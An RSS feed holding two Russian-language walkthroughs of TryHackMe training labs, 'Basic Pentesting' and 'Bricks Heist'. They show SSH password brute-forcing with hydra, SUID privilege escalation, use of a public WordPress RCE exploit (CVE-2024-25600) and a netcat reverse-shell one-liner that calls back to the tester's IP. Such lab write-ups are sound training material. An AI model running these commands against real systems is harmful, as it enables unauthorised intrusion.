<?xml version="1.0" encoding="utf-8" ?><rss version="2.0" xmlns:tt="http://teletype.in/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/"><channel><title>miz0ru</title><generator>teletype.in</generator><description><![CDATA[miz0ru]]></description><image><url>https://img4.teletype.in/files/77/32/773230e8-be8e-4123-b270-66debde215fd.png</url><title>miz0ru</title><link>https://teletype.in/@miz0ru</link></image><link>https://teletype.in/@miz0ru?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=miz0ru</link><atom:link rel="self" type="application/rss+xml" href="https://teletype.in/rss/miz0ru?offset=0"></atom:link><atom:link rel="next" type="application/rss+xml" href="https://teletype.in/rss/miz0ru?offset=10"></atom:link><atom:link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></atom:link><pubDate>Sun, 05 Apr 2026 17:15:16 GMT</pubDate><lastBuildDate>Sun, 05 Apr 2026 17:15:16 GMT</lastBuildDate><item><guid isPermaLink="true">https://teletype.in/@miz0ru/-VzncSm-6Ou</guid><link>https://teletype.in/@miz0ru/-VzncSm-6Ou?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=miz0ru</link><comments>https://teletype.in/@miz0ru/-VzncSm-6Ou?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=miz0ru#comments</comments><dc:creator>miz0ru</dc:creator><title>TryHackMe: Basic Pentesting</title><pubDate>Sun, 08 Jun 2025 17:22:44 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/7b/88/7b88f68a-87d4-4fe3-ac53-8463e2321c84.png"></media:content><category>Pentest</category><description><![CDATA[<img src="https://img1.teletype.in/files/8f/26/8f26370d-5353-4302-90ab-448220167a63.png"></img>https://tryhackme.com/room/basicpentestingjt]]></description><content:encoded><![CDATA[
  <p id="1LOo"><a href="https://tryhackme.com/room/basicpentestingjt" target="_blank">https://tryhackme.com/room/basicpentestingjt</a></p>
  <p id="DvRy">This is a machine that allows you to practice web app hacking and privilege escalation</p>
  <h3 id="dPZO">МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН <a href="https://t.me/miz0rubio" target="_blank">@MIZ0RU</a> КАНАЛ <a href="https://t.me/miz0rumain" target="_blank">@MIZ0RUMAIN</a></h3>
  <h3 id="XJ3U">МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН <a href="https://t.me/miz0rubio" target="_blank">@MIZ0RU</a> КАНАЛ <a href="https://t.me/miz0rumain" target="_blank">@MIZ0RUMAIN</a></h3>
  <h3 id="gty6">МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН <a href="https://t.me/miz0rubio" target="_blank">@MIZ0RU</a> КАНАЛ <a href="https://t.me/miz0rumain" target="_blank">@MIZ0RUMAIN</a></h3>
  <p id="ybie">Всех приветствую на райтапе лёгкой машины на THM &quot;Basic Pentesting&quot;!</p>
  <p id="u7dC">По классике подключаемся по OpenVPN, вписываем хост</p>
  <pre id="iV8n">echo &quot;10.XX.XX.XX basic.thm&quot; | sudo tee -a /etc/hosts</pre>
  <p id="CQr5">Запускаем nmap-скан</p>
  <pre id="JJIJ">sudo nmap -A -vv 10.XX.XX.XX</pre>
  <figure id="yMzY" class="m_original">
    <img src="https://img4.teletype.in/files/f9/97/f997d9a6-2054-416c-af9c-227c62df955f.png" width="813" />
  </figure>
  <p id="JcoB">Я сразу пошёл проверять OpenSSH 7.2p2 через searchsploit</p>
  <pre id="B7eo">searchsploit OpenSSH 7.2p2</pre>
  <p id="VDg4">Нашёлся Username Enumeration эксплоит, и можно было бы узнать юзернеймы, но я решил работать с Samb&#x27;ой. Запустим gobuster по директориям</p>
  <pre id="HOAF">gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u basic.thm</pre>
  <figure id="B0MX" class="m_original">
    <img src="https://img1.teletype.in/files/43/41/4341cb8f-83db-4c24-9261-0113af513812.png" width="751" />
  </figure>
  <p id="3kbh">Найдём директорию development, что станет нашим ответом. Внутри будет два .txt-файла, но там нет ничего ценного.</p>
  <p id="jK9B">Вспоминаем, что на сервере есть SMB, подключимся посредством</p>
  <pre id="YhCw">smbclient -L //basic.thm -N</pre>
  <p id="Oap7">-L - показать все доступные через SMB директории</p>
  <p id="Z0xr">-N - без пароля</p>
  <figure id="pHXZ" class="m_original">
    <img src="https://img4.teletype.in/files/7e/b3/7eb3cb15-2b01-43b6-9d3e-2318c7a63459.png" width="592" />
  </figure>
  <p id="Y7Wc">Найдём директорию Anonymous, подключимся к ней</p>
  <pre id="rkDc">smbclient //basic.thm/Anonymous -N</pre>
  <figure id="u8Ro" class="m_original">
    <img src="https://img2.teletype.in/files/50/91/50911662-b6f8-46a0-82da-a3d7f323ff27.png" width="772" />
  </figure>
  <p id="e3lD">Откроем список файлов и скачаем его с помощью get</p>
  <pre id="R1zN">ls
get staff.txt</pre>
  <p id="eXVP">После этого файл скачается в директорию, из которой вы подключились к SMB</p>
  <figure id="6BBp" class="m_original">
    <img src="https://img3.teletype.in/files/2a/78/2a785027-8385-4099-b303-044d09068bcb.png" width="715" />
  </figure>
  <p id="koT4">Внутри есть 2 имени: Jan и Kay, имя Jan подойдёт нам для ответа на пятый вопрос.</p>
  <p id="rzrS">Давайте сбуртим SSH используя имя Jan (самбу сбрутить не получится и Kay тоже). Воспользуемся для этого hydra и словарём rockyou.</p>
  <pre id="mGJv">hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://basic.thm</pre>
  <figure id="rpgX" class="m_original">
    <img src="https://img2.teletype.in/files/d0/e5/d0e5c7ad-0555-405d-8e95-04de1fbd54b2.png" width="928" />
  </figure>
  <p id="Oxfv">Находим пароль armando и подключаемся с этими данными по SSH, протокол, по которому мы подключаемся - седьмой ответ</p>
  <pre id="gxjf">ssh jan@basic.thm</pre>
  <p id="lqXq">Внутри пусто, спустимся в директорию /home/ и узнаем что там</p>
  <pre id="LuER">jan@basic2:~$ ls
jan@basic2:~$ pwd
/home/jan
jan@basic2:~$ cd ..
jan@basic2:~/home$ ls
jan kay</pre>
  <p id="T8j9">Попробуем узнать, что мы можем запускать используя sudo -l</p>
  <pre id="UWp6">jan@basic2:~$ sudo -l
[sudo] password for jan:
Sorry, user jan may not run sudo on basic2.</pre>
  <p id="BD4b">Столкнёмся с ошибкой. Попробуем войти в kay, опять столкнёмся с ошибкой</p>
  <pre id="xu8K">jan@basic2:/home$ sudo kay
[sudo] password for jan:
jan is not in the sudoers file. This incident will be reported</pre>
  <p id="N21n">В таком случае нам надо воспользоваться SUID. Это специальный бит, отвечающий за то, чтобы программу запускать от имени владельца.</p>
  <p id="kWMY">Чтобы найти все такие файлы воспользуемся командой</p>
  <pre id="CHlg">find / -perm -4000 -type f 2&gt;/dev/null</pre>
  <p id="NsXE">find - команда чтобы найти файлы</p>
  <p id="rNL7">/ - чтобы начать поиск по всей системе</p>
  <p id="5Mdq">-perm -4000 - ищет файлы с правами доступа 4000, то есть с SUID-битом</p>
  <p id="Pczx">-type f - ищет только файлы (исключая каталоги, сокеты...)</p>
  <p id="hy6O">2&gt;/dev/null - отключает вывод ошибок доступа, переправляя их в /dev/null</p>
  <figure id="NTVA" class="m_original">
    <img src="https://img4.teletype.in/files/f8/d6/f8d68660-f706-4211-80ee-440fbb12e8d8.png" width="453" />
  </figure>
  <p id="Tvia">Из данного списка сразу в глаза бросается, vim, будем иметь это ввиду</p>
  <pre id="6wij">/usr/bin/vim.basic</pre>
  <figure id="Wdbz" class="m_original">
    <img src="https://img3.teletype.in/files/69/8a/698afb71-a868-4bdb-9479-bb63c2650d87.png" width="544" />
  </figure>
  <p id="wIZ5">Откроем директорию /home/kay и попробуем прочитать с помощью cat pass.bak, но нам скажет, что у нас недостаточно прав. Узнаем полную информацию о файле и правах с помощью</p>
  <pre id="WXYX">ls -la</pre>
  <p id="zGpW">Увидим, что у файла pass.bak есть атрибут r, то есть открывается от имени рута. И вспоминаем, что vim, как раз умеет так делать, пишем</p>
  <pre id="fHDz">vim pass.bak</pre>
  <figure id="IdCn" class="m_original">
    <img src="https://img2.teletype.in/files/d9/de/d9dee376-52d7-4d34-bbed-883e40644363.png" width="670" />
  </figure>
  <p id="Fl9n">И вот наш последний ответ! Чтобы выйти из vim&#x27;а, просто напишите</p>
  <pre id="IXAx">:q</pre>
  <p id="dzJV">И нажмите Enter, поздравляю с ещё одной решённой задачей!</p>
  <h3 id="wd7I">МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН <a href="https://t.me/miz0rubio" target="_blank">@MIZ0RU</a> КАНАЛ <a href="https://t.me/miz0rumain" target="_blank">@MIZ0RUMAIN</a></h3>
  <h3 id="xVqz">МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН <a href="https://t.me/miz0rubio" target="_blank">@MIZ0RU</a> КАНАЛ <a href="https://t.me/miz0rumain" target="_blank">@MIZ0RUMAIN</a></h3>
  <h3 id="xMd0">МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН <a href="https://t.me/miz0rubio" target="_blank">@MIZ0RU</a> КАНАЛ <a href="https://t.me/miz0rumain" target="_blank">@MIZ0RUMAIN</a></h3>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@miz0ru/T8jLrgEg_TL</guid><link>https://teletype.in/@miz0ru/T8jLrgEg_TL?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=miz0ru</link><comments>https://teletype.in/@miz0ru/T8jLrgEg_TL?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=miz0ru#comments</comments><dc:creator>miz0ru</dc:creator><title>TryHACK3M: Bricks Heist</title><pubDate>Thu, 05 Jun 2025 15:09:57 GMT</pubDate><media:content medium="image" url="https://img4.teletype.in/files/76/ab/76ab494b-59b8-472f-ae5f-5f97ce6381de.png"></media:content><description><![CDATA[<img src="https://img3.teletype.in/files/69/63/6963b37a-367c-42e9-9306-047ff6e98890.png"></img>https://tryhackme.com/room/tryhack3mbricksheist]]></description><content:encoded><![CDATA[
  <p id="4qSs"><a href="https://tryhackme.com/room/tryhack3mbricksheist" target="_blank">https://tryhackme.com/room/tryhack3mbricksheist</a></p>
  <p id="Vk1t">Crack the code, command the exploit! Dive into the heart of the system with just an RCE CVE as your key.</p>
  <p id="6zQP"></p>
  <h3 id="gyS5">МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН @MIZ0RU ДЛЯ ФОРУМА @FORUMZERODAY ПРОСЬБА ПОДПИСАТЬСЯ</h3>
  <h3 id="7DWn">МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН @MIZ0RU ДЛЯ ФОРУМА @FORUMZERODAY ПРОСЬБА ПОДПИСАТЬСЯ</h3>
  <h3 id="SL2h">МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН @MIZ0RU ДЛЯ ФОРУМА @FORUMZERODAY ПРОСЬБА ПОДПИСАТЬСЯ</h3>
  <p id="pAWk"></p>
  <p id="L0FO">Всех приветствую, это райт-ап (write-up) лёгкой машины на THM &quot;Bricks Heist&quot;.</p>
  <p id="wUfg">Подключимся по OpenVPN<br />Добавим айпишник и хост в /etc/hosts</p>
  <pre id="Bsh6">echo &quot;10.XX.XX.XX bricks.thm&quot; | sudo tee -a /etc/hosts</pre>
  <p id="U0WC">Запустим nmap-скан</p>
  <pre id="3Nod">sudo nmap -sS -sC -sV -T4 -vv 10.XX.XX.XX&#x60;&#x60;&#x60;</pre>
  <figure id="FU6y" class="m_original">
    <img src="https://img3.teletype.in/files/af/6d/af6d9c89-d870-4cdb-a7eb-343cc32a484f.png" width="861" />
  </figure>
  <p id="THIA">Внизу также есть MySQL, но он не понадобился. Стоит пока обратить внимание на директорию <strong>/wp-admin/</strong>. Попробуем открыть сам сайт по http протоколу, но столкнёмся с ошибкой</p>
  <figure id="u0WV" class="m_original">
    <img src="https://img4.teletype.in/files/f2/f4/f2f4355a-f7c0-4e72-9c58-40e2235922ba.png" width="704" />
  </figure>
  <p id="0sTk">Попробуем перейти по httpS, SSL недействительный. Но сайт хотя бы грузится, но внутри будет только стена. Воспользуемся gobuster, чтобы прошелестить директории, воспользуемся списком <a href="https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/directory-list-2.3-medium.txt" target="_blank">directory-list-2.3-medium.txt</a>.<br /></p>
  <pre id="81B0">gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://bricks.thm</pre>
  <p id="Rezo">Но выйдет ошибка, говорящая о недействительном SSL. Найдём соответствующий аргумент с помощью --help и grep</p>
  <pre id="rkzQ">gobuster dir --help | grep &quot;tls&quot;</pre>
  <figure id="QqTd" class="m_original">
    <img src="https://img2.teletype.in/files/51/e6/51e6267a-9b26-4cae-b61f-d3cfd752f10c.png" width="618" />
  </figure>
  <p id="eQHZ">Найдём аргумент -k, который нам поможет запустить скан директорий.</p>
  <figure id="5v1m" class="m_original">
    <img src="https://img3.teletype.in/files/66/f1/66f124dc-4bbf-4d7f-97d7-5484e6ba550b.png" width="861" />
  </figure>
  <p id="bOpc">Натыкаемся снова на директории от WordPress (wp-content, admin). Становится ясно, куда копать дальше - расчехляем wpscan. Опять сталкиваемся с проблемами с ssl, повторяем действия</p>
  <pre id="U7yO">wpscan --help | grep tls</pre>
  <figure id="OhkR" class="m_original">
    <img src="https://img3.teletype.in/files/25/bd/25bd7bae-d6af-4dff-9cac-5a63c4b65ecf.png" width="937" />
  </figure>
  <figure id="tFuy" class="m_original">
    <img src="https://img4.teletype.in/files/30/b8/30b8cfab-e4ab-4109-91b4-46425c80ccbe.png" width="766" />
  </figure>
  <p id="nauD">Запустили скан и видим тему &quot;bricks&quot;. Вспоминаем название задания, что является подсказкой и идём копать глубже.</p>
  <p id="VSRS">Нехитрым запросом в гугле находим саму CVE и PoC к ней.</p>
  <figure id="jhdp" class="m_original">
    <img src="https://img2.teletype.in/files/99/eb/99eb3690-573f-41b6-9297-dea0b3842a95.png" width="736" />
  </figure>
  <p id="MG2c"><a href="https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT" target="_blank">https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT</a> - воспользуемся этим скриптом.</p>
  <pre id="yRpD">Клонируем репозиторий, входим в директорию и запускаем
git clone https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT
cd CVE-2024-25600-EXPLOIT
python CVE-2024-25600.py</pre>
  <p id="5i4O">Но мы столкнёмся с проблемой: ModuleNotFoundError: No module named &#x27;alive_progress&#x27;. Как я её решил (конечно, не очень правильно)</p>
  <pre id="QSHp">nano CVE-2024-25600.py</pre>
  <figure id="NoLR" class="m_original">
    <img src="https://img4.teletype.in/files/7c/bf/7cbfd981-690b-4cba-8a66-ff8b415fed7c.png" width="928" />
  </figure>
  <p id="my6Z">Я просто закомментировал 13 строку, которая мешает работе скрипта. Сохранил (Ctrl + O, Enter, Ctrl + X)</p>
  <figure id="nJ2M" class="m_original">
    <img src="https://img4.teletype.in/files/76/f8/76f8fc2b-e794-4286-a0de-e4ebe63659a5.png" width="812" />
  </figure>
  <p id="CjjU">И скрипт заработал! Чтобы совершить атаку пишем:</p>
  <pre id="pCXd">python CVE-2024-25600.py -u https://bricks.thm</pre>
  <p id="NjCo">Пара секунд и мы в шелле! Чтобы сделать всё надёжнее сделаем уже reverse shell. Воспользуемся генератором <a href="https://www.revshells.com/" target="_blank">revshells.com</a>. Настроим его под себя:</p>
  <figure id="GKmz" class="m_original">
    <img src="https://img1.teletype.in/files/4d/d7/4dd79ddd-b3da-425c-8e5e-55bb5686604a.png" width="927" />
  </figure>
  <p id="MGRl">В разделе IP &amp; PORT ставим айпишник, который нам выдаст команда</p>
  <pre id="XByE">ifconfig</pre>
  <figure id="tZ9a" class="m_original">
    <img src="https://img4.teletype.in/files/bc/f2/bcf2c308-d8f4-4d9a-9e0d-9681a4cc2633.png" width="733" />
  </figure>
  <p id="nJVm">Нас интересует интерфейс tun0, читаем параметр inet и записываем значение айпи в генератор. Так же его можно увидеть в правом верхнем углу. </p>
  <p id="T6Dj">Чтобы слушать порт мы вводим в кали команду (откройте новый терминал):</p>
  <pre id="EuZv">nc -nvlp PORT</pre>
  <figure id="2J7A" class="m_original">
    <img src="https://img2.teletype.in/files/1f/a5/1fa5945d-d233-4e53-9e90-4fa348016432.png" width="789" />
  </figure>
  <p id="MZhQ">Выбираете порт, которым будете пользоваться для прослушивания, в моём случае 1337.</p>
  <p id="L6x5">И как видно на скрине, я воспользовался payload&#x27;ом &#x27;nc mkinfo&#x27;, он работает безотказно. Пишем сгенерированную команду в строку Shell &gt;</p>
  <pre id="HyF2">rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2&gt;&amp;1|nc 10.21.199.107 1337 &gt;/tmp/f</pre>
  <p id="kUMG">И вуаля, на другом терминале у вас открылась копия командной строки (это нужно для того, что эксплойт может прерваться, что вам помешает).</p>
  <p id="jGnI">Когда мы уже в системе напишем ls и увидим список файлов, первый будет подозрительный .txt&#x27;шник. Прочитаем его с помощью команды cat и получим наш первый флаг!</p>
  <pre id="gQZf">cat 650c844110baced87e1606453b93f22a.txt</pre>
  <p id="gcBk">Чтобы получить второй воспользуемся командой</p>
  <pre id="aloL">systemctl | grep running</pre>
  <p id="oQA5">Обнаружим, что есть какой-то странный процесс ubuntu.service, его выдаёт подпись TRYHACK3M. Изучим его глубже:</p>
  <pre id="nNgI">systemctl status ubuntu.service</pre>
  <figure id="Jhcu" class="m_original">
    <img src="https://img3.teletype.in/files/61/ed/61edd94f-42da-44b1-8d01-378b37487486.png" width="721" />
  </figure>
  <p id="39TV">Увидим какой-то nm-inet-dialog, этот процесс и есть подозрительный, так что это будет наш второй флаг.</p>
  <p id="rgRY">Третий флаг уже ясен, это ubuntu.service.</p>
  <p id="Y47w">Перейдём в директорию /lib/NetworkManager/nm-inet-dialog и узнаем содержимое с помощью ls</p>
  <pre id="sY4R">cd /lib/NetworkManager/nm-inet-dialog
ls</pre>
  <p id="tbwI">Там будет inet.conf, прочитаем его содержание и увидим, что это и есть логи майнера, которые нам надо было найти.</p>
  <pre id="XTgo">cat inet.conf</pre>
  <figure id="kCRp" class="m_original">
    <img src="https://img2.teletype.in/files/52/9d/529d1ab2-a285-47bc-8cd5-fbe98269ab88.png" width="938" />
  </figure>
  <p id="OtkW">Так же мы можем прочитать ID: ..., закинем его в <a href="https://gchq.github.io/CyberChef/" target="_blank">CyberChef</a> и попробуем расшифровать. </p>
  <figure id="TxVE" class="m_original">
    <img src="https://img1.teletype.in/files/c0/ad/c0adbd4b-f48a-41b7-990d-2c53d79ba577.png" width="761" />
  </figure>
  <p id="mdGy">Казалось бы, вот наш ключ, но он неправильный. Из-за формата текст дублируется дважды, так что мы его отсекаем до момента, когда он повторится.</p>
  <p id="fIja">Это наш 4-ый флаг: bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa</p>
  <p id="gYzA">А теперь применим навыки OSINT, поищем владельца кошелька. Нас ведёт на blockchain.com: <a href="https://www.blockchain.com/explorer/addresses/btc/bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa" target="_blank">https://www.blockchain.com/explorer/addresses/btc/bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa</a></p>
  <figure id="sYcz" class="m_original">
    <img src="https://img2.teletype.in/files/17/ee/17ee9ad0-8874-45aa-a70b-57a446ba3db2.png" width="875" />
  </figure>
  <p id="J4Ig">Откроем транзакцию на 3.85799... BTC. Поищем в интернете этот адрес и наткнёмся на сводку от государства: <a href="https://ofac.treasury.gov/recent-actions/20240220" target="_blank">https://ofac.treasury.gov/recent-actions/20240220</a>. В ней уже можно прочитать о какой группировке идёт речь, это LockBit, что является нашим 5-ым флагом!</p>
  <h3 id="2OUJ">МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН @MIZ0RU ДЛЯ ФОРУМА @FORUMZERODAY ПРОСЬБА ПОДПИСАТЬСЯ</h3>

]]></content:encoded></item></channel></rss>